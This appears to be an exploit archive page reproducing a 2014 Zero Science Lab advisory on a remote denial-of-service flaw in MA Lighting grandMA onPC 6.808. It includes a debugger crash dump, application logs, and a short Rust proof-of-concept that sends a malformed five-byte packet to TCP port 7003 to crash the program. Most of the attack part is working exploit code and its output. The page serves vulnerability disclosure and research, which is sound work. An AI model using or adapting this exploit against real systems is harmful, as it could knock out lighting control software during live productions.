MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulnerability



EKU-ID: 3945 CVE: OSVDB-ID:
Author: LiquidWorm Published: 2014-04-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
  
MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit
  
  
Vendor: MA Lighting Technology GmbH
Product web page: http://www.malighting.com
Affected version: grandMA series 1 onPC Software 6.808 (6.801)
  
Summary: The grandMA onPC software incorporates all functions of a grandMA
console and offers you its full potential on your notebook or PC. You can
use grandMA onPC for running, programming or offline pre-programming, as
well as a smart backup solution within the grandMA system. With the MA onPC
command wing and MA onPC fader wing MA Lighting has developed a sophisticated
hardware extension perfectly suited for the grandMA onPC software.
  
Desc: grandMA onPC version 6.808 is exposed to a remote denial of service
issue when processing socket connection negotiation. This issue occurs when
the application handles a single malformed packet over TCP port 7003, resulting
in a crash.
  
===========================================================================
  
(1324.be4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b
eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
ntdll!RtlEnterCriticalSection+0x12:
77ce22c2 f00fba3000      lock btr dword ptr [eax],0   ds:002b:3535393f=????????
  
--
  
303.640 GMA : RR NEW  STATION IN NETWORK 127.0.0.1(100) AS Standalone
367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1
367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY !
367.180 CC  : ******* EXCEPTION **************************
367.180 CC  : * ACCESS_VIOLATION
367.180 CC  : * EAX = 37363341  EBX =  6D856B0
367.180 CC  : * ECX = 37363339  EDX =  B78F41C
367.180 CC  : * ESI = 37363341  EDI = 3736333D
367.180 CC  : * DESKTYP : GMA [Windows]
367.180 CC  : * VERSION : 6.808 STREAMING : 6801
367.180 CC  : ********************************************
367.240 CC  : 0x775522c2 RtlEnterCriticalSection() + 0x12
  
===========================================================================
  
  
Tested on: Microsoft Windows 7 Professional SP1 (EN)
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
  
  
Advisory ID: ZSL-2014-5183
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php
  
  
31.03.2014
  
*/
  
  
use std::io::net::ip::SocketAddr;
use std::io::net::tcp::TcpStream;
  
fn bann() {
    println!("
    +======================================+
    | grandMA onPC 6.808 Denial of Service |
    |--------------------------------------|
    |                                      |
    |           ID: ZSL-2014-5183          |
    +======================================+
    ");
}
  
fn main() {
    bann();
    println!("\n[*] Sending packet to local host on tcp port 7003\n");
    let addr = from_str::<SocketAddr>("127.0.0.1:7003").unwrap();
    let mut socket = TcpStream::connect(addr).unwrap();
    socket.write(bytes!("\x74\x30\x30\x74\x21"));
    println!("[*] Crashed!\n");
}